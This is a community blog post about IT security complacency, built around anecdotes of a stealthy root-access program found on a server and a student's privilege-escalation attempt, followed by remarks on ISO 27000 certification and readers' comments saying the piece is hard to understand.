element14 Community
element14 Community
    Register Log In
  • Site
  • Search
  • Log In Register
  • Community Hub
    Community Hub
    • What's New on element14
    • Feedback and Support
    • Benefits of Membership
    • Personal Blogs
    • Members Area
    • Achievement Levels
  • Learn
    Learn
    • Ask an Expert
    • eBooks
    • element14 presents
    • Learning Center
    • Tech Spotlight
    • STEM Academy
    • Webinars, Training and Events
    • Learning Groups
  • Technologies
    Technologies
    • 3D Printing
    • FPGA
    • Industrial Automation
    • Internet of Things
    • Power & Energy
    • Sensors
    • Technology Groups
  • Challenges & Projects
    Challenges & Projects
    • Design Challenges
    • element14 presents Projects
    • Project14
    • Arduino Projects
    • Raspberry Pi Projects
    • Project Groups
  • Products
    Products
    • Arduino
    • Avnet Boards Community
    • Dev Tools
    • Manufacturers
    • Multicomp Pro
    • Product Groups
    • Raspberry Pi
    • RoadTests & Reviews
  • Store
    Store
    • Visit Your Store
    • Choose another store...
      • Europe
      •  Austria (German)
      •  Belgium (Dutch, French)
      •  Bulgaria (Bulgarian)
      •  Czech Republic (Czech)
      •  Denmark (Danish)
      •  Estonia (Estonian)
      •  Finland (Finnish)
      •  France (French)
      •  Germany (German)
      •  Hungary (Hungarian)
      •  Ireland
      •  Israel
      •  Italy (Italian)
      •  Latvia (Latvian)
      •  
      •  Lithuania (Lithuanian)
      •  Netherlands (Dutch)
      •  Norway (Norwegian)
      •  Poland (Polish)
      •  Portugal (Portuguese)
      •  Romania (Romanian)
      •  Russia (Russian)
      •  Slovakia (Slovak)
      •  Slovenia (Slovenian)
      •  Spain (Spanish)
      •  Sweden (Swedish)
      •  Switzerland(German, French)
      •  Turkey (Turkish)
      •  United Kingdom
      • Asia Pacific
      •  Australia
      •  China
      •  Hong Kong
      •  India
      •  Korea (Korean)
      •  Malaysia
      •  New Zealand
      •  Philippines
      •  Singapore
      •  Taiwan
      •  Thailand (Thai)
      • Americas
      •  Brazil (Portuguese)
      •  Canada
      •  Mexico (Spanish)
      •  United States
      Can't find the country/region you're looking for? Visit our export site or find a local distributor.
  • Translate
  • Profile
  • Settings
Personal Blogs
  • Community Hub
  • More
Personal Blogs
Legacy Personal Blogs Security and ease
  • Blog
  • Documents
  • Mentions
  • Sub-Groups
  • Tags
  • More
  • Cancel
  • New
  • Share
  • More
  • Cancel
Group Actions
  • Group RSS
  • More
  • Cancel
Engagement
  • Author Author: luigimorelli
  • Date Created: 7 Nov 2019 10:28 AM Date Created
  • Views 1214 views
  • Likes 3 likes
  • Comments 7 comments
  • security
  • it
Related
Recommended

Security and ease

luigimorelli
luigimorelli
7 Nov 2019

image

 

Nowadays trying to violate the security of a system has become quite easy.

 

Today I received the visit of a colleague of mine, working on the IT security staff. He asked me if I could give an eye to a C program, and I obviously accepted; big was my astonishment when I realized that that “innocent code” is nothing less than a “stealth code” allowing the attacker to enter a Linux system, taking ownership of the root credentials and hiding his actions. But still there was something not clear in it: the code was extremely well commented, tidy, apparently written for didactic purposes only. “Who gave you this program?” I suddenly asked my friend. He blushed, and admitted “I isolated it on a bad-behaving server, and now I understood why. Reading the command history I noticed that a user entered it as root, downloaded (and compiled!) the malware and fired it: after that, he could log in in stealth mode, and do whatever he wanted. Fortunately, he just tried a few commands.”

 

The dodger was a script kid after all, and left a number of clues of his actions everywhere. He even left his source code on his workspace. Anyway, the inherent to such situations is fairly high: still higher when the server faces the Internet, keeping all the default options of configuration disregarding the basics of IT security.

 

Among other things, the code had a link to a peculiar IP address, a sort of “signature”; on an afterthought I could easily show that such link opened a true “wonder shop”, a real arsenal of utilites and documentation related to hacking and cracking.

The big luck here is that the majority of the script kiddies is so overwhelmed by how easy violating others’ computers is, that they don’t even read manuals, caveats or other documentation needed to do a clean job.

 

There is a practice of orally handing down all the installation and use methods for those programs: this custom keeps the job of the security manager much easier.

 

I was told a nice anecdote about it: we are in the CS lab of a big university, and a student (he/she could be either a freshman or a sophomore) calls his tutor, complaining that “the C compiler does not work”. The tutor approaches the PC, throws an eye to the code, then sees something that flashes his attention. The code thta “did not compile” should create a shell that gave the user the option to recall all the programs on the server with maximum privileges. Obviously the student did not have the skills to operate such code, and the University had other security systems to inhibit such malicious behaviour. What I want to underline, here, is how easy and controlless is sometimes the path to access private data.

 

Security does not mean ease about our data intangibility and our machines’ inaccessibility. Security means knowledge of the risks, and continuous audit.

 

It is useless to implement a data backup routine when there is no one that checks it routinely (the risk here is to lose older backups by overwriting them with erroneous data modified after an attack), but the ease for the state of a system whose security has been tested once is useless as well, because new intrusive technologies that take advantage of software bugs or weakness are continuously developed.

 

Post scriptum

Bruce Schneier was used to repeat that there exist only two classes of cyphering systems: one that allows you to hide your data to your 5-years old sister, and one that grants your privacy against the government. Latest news from Wikileaks and NSA make us understand which security class is most used today.

 

Sure enough, cyphering is not all: we have digital signage systems, electronic certificates, procedures and processes tightly connexed to the corporate security, technological infrastructures, abstraction layers… and post-its.

 

In such cases, the level of security is equal to its weaker link: it is not so rare to meet users that stick yellow, visible post-its near to their PCs to “remember” the passwords to access successive layers of security, or managers who forget to monitor the corporrate telephone lines from where any potential hacker with a portable PC and modem could penetrate inside the corporate intranet.

 

It is well known how the violation of sensitive data is mostly due to corporate staff; anyway, far from justify the lowering of the defenses, such behaviour should take to rethink not just the technical infrastructure, but also the control procedures. And here we come again to face bureaucracy: the procedures to evaluate data management risks inside the corporate is gathered inside the ISO 27000 regulations; to obtain the ISO 27000 certification, the corporate should front a long series of structural, environmental, regulatory, behavioural, juridical and processual changes, and agree to periodic and sample checks about the regulations application. This means a huge expense, to be considered as a long-term investment, because the procedures specify as far as the kind of modules to release the security policies in case the Security manager leaves.

 

Even if economically and logistically heavy, such method should be seen positively foreseen in anticipation of the better enterprise security, but then… What happens when an ISO 9000 certified corporation fails a sample check? Easy: it is rebuked by the Control Authority, and forced to realign through the next three months, or loses the certification. A well-thought process in case of the ISO 9000 regulation, but a disaster in case of the ISO 27000 regulation: a bad mark on a sample check would simply announce that “the corporation XYZ is not aligned to the the security policies: please feel free to bomb it in any way you know”. Or just hide such lack of good marks during the check, waiting for a security rebalancing. Here is the confirmation that the regulations hold an exquisitely bureaucratic meaning, and give nothing from the standpoint of corporate security in case of their violation.

  • Sign in to reply

Top Comments

  • colporteur
    colporteur over 5 years ago +2
    Can you clarify your post, so I might gain a modicum of understanding? As a former IT security specialist, I am drawn to security articles like a moth is drawn to a flame. Your introduction containing…
  • clem57
    clem57 over 5 years ago in reply to luigimorelli +2
    Is this what we are talking about: www.youtube.com/watch Just trying to clear the air luigimorelli ...
  • luigimorelli
    luigimorelli over 5 years ago in reply to colporteur +1
    Sure, thank you for your interest. The post is part of a e-publication titled "Fenomenology of the Programmer" (written in Italian language). Each chapter was in part a description of something that really…
  • colporteur
    colporteur over 5 years ago in reply to clem57

    I rather enjoyed hte resource. How much I will retain is the question. I never had a desire to be a programmer. I would like to improve the skills that I have accumulated but not to the point I could call myself a programmer. I will cut the ties that bind me to the "Fenomenology of the Programmer". The post triggered a false positive.

     

    Sean

    • Cancel
    • Vote Up 0 Vote Down
    • Sign in to reply
    • More
    • Cancel
  • clem57
    clem57 over 5 years ago in reply to luigimorelli

    Is this what we are talking about:

    You don't have permission to edit metadata of this video.
    Edit media
    x
    image
    Upload Preview
    image

    Just trying to clear the air luigimorelli ...

    • Cancel
    • Vote Up +2 Vote Down
    • Sign in to reply
    • More
    • Cancel
  • neilk
    neilk over 5 years ago

    I didn't really understand any of this.

     

    I was drawn to read it because of its title - "Moreware - Mindware site for Raspberry and Arduino prototyping"  

     

    What was the relevance of this title?

     

    Neil

    • Cancel
    • Vote Up 0 Vote Down
    • Sign in to reply
    • More
    • Cancel
  • colporteur
    colporteur over 5 years ago in reply to luigimorelli

    When I need a refresher on programmers I pull out Mythical Man Month by Fred Brooks. Not much has changed. Give a programmer a well defined set of requirements and 9/10 chances they provide code that meets requirements. Give a programmer a wish list and you get the programmers book of dreams. I have often wondered what are Steven Kings bad dreams like, considering what he writes when he is not dreaming.

     

    Security requirements for coding needs to be built in and not bolted on. OpenBSD is an example of an O/S with built in security and MS Windows products are an example of bolt on security. The bolt on security is typically where you encounter problems.

     

    Your post was a squirrel that caught my attention. I will back away from the discussion, it is to esoteric for me.

     

    Sean

    • Cancel
    • Vote Up +1 Vote Down
    • Sign in to reply
    • More
    • Cancel
  • shabaz
    shabaz over 5 years ago

    I couldn't understand any of this article : (

    I really wanted to. Is there any simpler/shorter explanation? If it has been auto-translated, this may explain it, because the sentences are a bit confusing.

    • Cancel
    • Vote Up +1 Vote Down
    • Sign in to reply
    • More
    • Cancel
>
element14 Community

element14 is the first online community specifically for engineers. Connect with your peers and get expert answers to your questions.

  • Members
  • Learn
  • Technologies
  • Challenges & Projects
  • Products
  • Store
  • About Us
  • Feedback & Support
  • FAQs
  • Terms of Use
  • Privacy Policy
  • Legal and Copyright Notices
  • Sitemap
  • Cookies

An Avnet Company © 2025 Premier Farnell Limited. All Rights Reserved.

Premier Farnell Ltd, registered in England and Wales (no 00876412), registered office: Farnell House, Forge Lane, Leeds LS12 2NE.

ICP 备案号 10220084.

Follow element14

  • X
  • Facebook
  • linkedin
  • YouTube